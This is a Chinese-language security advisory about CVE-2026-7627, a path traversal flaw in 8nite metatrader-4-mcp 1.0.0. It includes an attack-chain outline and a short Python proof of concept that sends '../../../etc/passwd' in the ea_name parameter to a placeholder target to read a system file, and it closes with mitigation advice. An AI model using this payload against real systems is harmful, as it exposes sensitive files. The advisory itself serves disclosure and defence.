IPBUF安全漏洞报告
English
CVE-2026-7627 CVSS 6.3 中危

CVE-2026-7627 metatrader-4-mcp路径遍历漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7627
漏洞类型
路径遍历
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
8nite metatrader-4-mcp

相关标签

路径遍历CVE-2026-7627metatrader-4-mcp8nite文件包含

漏洞概述

8nite metatrader-4-mcp 1.0.0版本中存在一处安全漏洞。该漏洞位于组件sync_ea_from_file的src/index.ts文件中的CallToolRequestSchema函数。由于对参数ea_name的校验不严,攻击者可通过恶意构造该参数引发路径遍历漏洞。此攻击无需复杂交互即可远程发起,且利用代码已公开,目前厂商尚未修复,存在较高的安全风险。

技术细节

该漏洞属于典型的路径遍历漏洞,其根本原因在于应用程序未对用户输入的参数进行严格的边界检查和过滤。具体而言,在8nite metatrader-4-mcp组件的sync_ea_from_file功能中,CallToolRequestSchema函数直接处理用户提供的ea_name参数。当攻击者向受影响端点发送特制请求时,可以通过在ea_name参数中插入“../”等目录跳转字符,绕过预期的文件访问限制。由于CVSS向量显示权限要求为低(PR:L),攻击者可能仅需基础的应用程序访问权限即可利用此漏洞。成功利用后,攻击者能够读取或写入应用程序Web根目录之外的敏感文件,导致机密性、完整性和可用性受损。尽管漏洞已公开,但目前官方尚未发布补丁。

攻击链分析

STEP 1
信息收集
攻击者识别运行8nite metatrader-4-mcp 1.0.0的目标系统。
STEP 2
权限获取
攻击者获取系统的低权限账户访问权限(PR:L)。
STEP 3
构造攻击载荷
攻击者构造包含“../”序列的恶意ea_name参数。
STEP 4
发送恶意请求
将包含恶意参数的请求发送至CallToolRequestSchema接口。
STEP 5
执行路径遍历
服务器未过滤参数,导致读取或写入非预期目录文件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target-ip:port/api/sync_ea_from_file" # Malicious payload attempting to traverse directories # Assuming the tool accepts a JSON payload based on typical MCP/API structures payload = { "ea_name": "../../../etc/passwd" # Path traversal payload } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Potential exploitation successful. Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

8nite metatrader-4-mcp 1.0.0

防御指南

临时缓解措施
建议暂时禁用受影响的 sync_ea_from_file 组件功能,直到官方发布修复补丁。同时,应在网络边界部署WAF规则,拦截包含“../”或类似路径遍历特征的恶意请求,以降低被攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表